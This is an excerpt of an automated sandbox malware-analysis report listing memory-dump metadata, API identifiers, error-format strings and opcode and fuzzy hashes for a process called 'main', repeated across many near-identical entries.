                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: ff99df98ac40d678d4600e7361d83eba45d24b9d8da5072bcfe5feb04d693132
                                    • Instruction ID: 98d7d57c4263d53081a7936a905f9c672a45915a92f2f87a3917f44ba7434e07
                                    • Opcode Fuzzy Hash: ff99df98ac40d678d4600e7361d83eba45d24b9d8da5072bcfe5feb04d693132
                                    • Instruction Fuzzy Hash: A5F05433B0B107C2F963BB04B4417B995521F55378E8B0AB5CD490E6F1AE3EA9C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: ff99df98ac40d678d4600e7361d83eba45d24b9d8da5072bcfe5feb04d693132
                                    • Instruction ID: 98d7d57c4263d53081a7936a905f9c672a45915a92f2f87a3917f44ba7434e07
                                    • Opcode Fuzzy Hash: ff99df98ac40d678d4600e7361d83eba45d24b9d8da5072bcfe5feb04d693132
                                    • Instruction Fuzzy Hash: A5F05433B0B107C2F963BB04B4417B995521F55378E8B0AB5CD490E6F1AE3EA9C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: ff99df98ac40d678d4600e7361d83eba45d24b9d8da5072bcfe5feb04d693132
                                    • Instruction ID: 98d7d57c4263d53081a7936a905f9c672a45915a92f2f87a3917f44ba7434e07
                                    • Opcode Fuzzy Hash: ff99df98ac40d678d4600e7361d83eba45d24b9d8da5072bcfe5feb04d693132
                                    • Instruction Fuzzy Hash: A5F05433B0B107C2F963BB04B4417B995521F55378E8B0AB5CD490E6F1AE3EA9C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction ID: 030b448e08b1d9aa3eefe5524eabd899fdb9b589966e13d600e2de4ca03caef2
                                    • Opcode Fuzzy Hash: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction Fuzzy Hash: BCF05433B0B207C2F963BB04B4417B995521F55379E8B0AB5CD490E6F1AE3EA8C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: cb44c17b4e47c61bceb64ef853c57834eac4735260689cd32846fd4a7b3e6c0b
                                    • Instruction ID: 72772b8673c10ed9cafe45aad5980bdd99ba1260919da5cd69bf31edb99e793b
                                    • Opcode Fuzzy Hash: cb44c17b4e47c61bceb64ef853c57834eac4735260689cd32846fd4a7b3e6c0b
                                    • Instruction Fuzzy Hash: 53F03023B0B106C2F963AA04B4417B995522F55378E8B0AB58D480A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: baac9c1114a98bed6eae314587cd68cb6fb42297a9dc9bc8ec8630a526df8742
                                    • Instruction ID: b51046235e59f39a8a5d9966367ab339c36a50904b4f04dbb66a8eb97c82f662
                                    • Opcode Fuzzy Hash: baac9c1114a98bed6eae314587cd68cb6fb42297a9dc9bc8ec8630a526df8742
                                    • Instruction Fuzzy Hash: D1F03023A0B106C2F963AA04B4417B995521F55378E8B0AB5CD490A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction ID: 54bd699ae22562beec09e08ef17eb5b5a256da3638fa963e94642d4215f613aa
                                    • Opcode Fuzzy Hash: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction Fuzzy Hash: 51F03023A0B106C2F963AA04B4417B995521F55378E8B0AB58D490A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: b4472d493916910336c3a184dc5fe2b6a72edf1b18ce426c0d0c23c479426e80
                                    • Instruction ID: c0a2e7e7b9d2896269db39d0b3f7c6517c3bc0fcd08a69a2047652da24dbc3c2
                                    • Opcode Fuzzy Hash: b4472d493916910336c3a184dc5fe2b6a72edf1b18ce426c0d0c23c479426e80
                                    • Instruction Fuzzy Hash: EEF05433B0B107C2F963BB04B4417B995521F55378E8B0AB5CD490E6F1AE3EA8C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction ID: 54bd699ae22562beec09e08ef17eb5b5a256da3638fa963e94642d4215f613aa
                                    • Opcode Fuzzy Hash: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction Fuzzy Hash: 51F03023A0B106C2F963AA04B4417B995521F55378E8B0AB58D490A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction ID: 030b448e08b1d9aa3eefe5524eabd899fdb9b589966e13d600e2de4ca03caef2
                                    • Opcode Fuzzy Hash: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction Fuzzy Hash: BCF05433B0B207C2F963BB04B4417B995521F55379E8B0AB5CD490E6F1AE3EA8C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: b4472d493916910336c3a184dc5fe2b6a72edf1b18ce426c0d0c23c479426e80
                                    • Instruction ID: c0a2e7e7b9d2896269db39d0b3f7c6517c3bc0fcd08a69a2047652da24dbc3c2
                                    • Opcode Fuzzy Hash: b4472d493916910336c3a184dc5fe2b6a72edf1b18ce426c0d0c23c479426e80
                                    • Instruction Fuzzy Hash: EEF05433B0B107C2F963BB04B4417B995521F55378E8B0AB5CD490E6F1AE3EA8C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: baac9c1114a98bed6eae314587cd68cb6fb42297a9dc9bc8ec8630a526df8742
                                    • Instruction ID: b51046235e59f39a8a5d9966367ab339c36a50904b4f04dbb66a8eb97c82f662
                                    • Opcode Fuzzy Hash: baac9c1114a98bed6eae314587cd68cb6fb42297a9dc9bc8ec8630a526df8742
                                    • Instruction Fuzzy Hash: D1F03023A0B106C2F963AA04B4417B995521F55378E8B0AB5CD490A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 5bc20ac583c950df92259a1b8d7f14786c9909c5f1ae333172e60870b9f1a24e
                                    • Instruction ID: 819a58902e7bed1fa550209c1452f8b4582f3ae0dda1273d5c1ad3c6e0db3697
                                    • Opcode Fuzzy Hash: 5bc20ac583c950df92259a1b8d7f14786c9909c5f1ae333172e60870b9f1a24e
                                    • Instruction Fuzzy Hash: 88F03023A0B106C2F963AB04B4417B995521F55368E8B0AB58D490A6F1AE3EA9879320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: cb44c17b4e47c61bceb64ef853c57834eac4735260689cd32846fd4a7b3e6c0b
                                    • Instruction ID: 72772b8673c10ed9cafe45aad5980bdd99ba1260919da5cd69bf31edb99e793b
                                    • Opcode Fuzzy Hash: cb44c17b4e47c61bceb64ef853c57834eac4735260689cd32846fd4a7b3e6c0b
                                    • Instruction Fuzzy Hash: 53F03023B0B106C2F963AA04B4417B995522F55378E8B0AB58D480A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction ID: 030b448e08b1d9aa3eefe5524eabd899fdb9b589966e13d600e2de4ca03caef2
                                    • Opcode Fuzzy Hash: 6a16524ac11222bf263ae38b72c6ef1abeee5a46696a02edfdfba4fb478cf8ca
                                    • Instruction Fuzzy Hash: BCF05433B0B207C2F963BB04B4417B995521F55379E8B0AB5CD490E6F1AE3EA8C78320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction ID: 54bd699ae22562beec09e08ef17eb5b5a256da3638fa963e94642d4215f613aa
                                    • Opcode Fuzzy Hash: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction Fuzzy Hash: 51F03023A0B106C2F963AA04B4417B995521F55378E8B0AB58D490A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: c0d6bb7511871c5a68bf8da3c77fa9bd4f52e7e41db3f0cbe9c9b3ce7f7b5488
                                    • Instruction ID: 8178701e6d9253ff1fe19a5c0c6e6ecc8626564d6204742c20cc561b481b1eb5
                                    • Opcode Fuzzy Hash: c0d6bb7511871c5a68bf8da3c77fa9bd4f52e7e41db3f0cbe9c9b3ce7f7b5488
                                    • Instruction Fuzzy Hash: 2EF068E271C6CA41F5539B20FC403B56154AF46794F44023ADD5D866B0DFBDDE859301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: a055b4778c3783c3e4fa707d1fe53f1d983445d5da2b89f4e01d61ab3e764a99
                                    • Instruction ID: c2a8bdf814aec4046f6c56901b2820640b4de64dcbff649172d882f2cae28687
                                    • Opcode Fuzzy Hash: a055b4778c3783c3e4fa707d1fe53f1d983445d5da2b89f4e01d61ab3e764a99
                                    • Instruction Fuzzy Hash: 94F068E271C6CA42F5539B20FC403B56154AF46794F44023ADD5DC66B0DFBDDD859301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                    • API String ID: 1001908780-1680961811
                                    • Opcode ID: fd9f8888c0c0265d1dad1df399124e1029d37ca8bf3deb28ef4ddfae8a1056fc
                                    • Instruction ID: fb8ac543755b90330e0209250c60278e51b730203016914ce76c42db23ba2b46
                                    • Opcode Fuzzy Hash: fd9f8888c0c0265d1dad1df399124e1029d37ca8bf3deb28ef4ddfae8a1056fc
                                    • Instruction Fuzzy Hash: 58F0C8E270C2CA41F5538B20FC403B56154AF46794F440239DD1D862B0EFBDDD859301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Closefflushfwrite
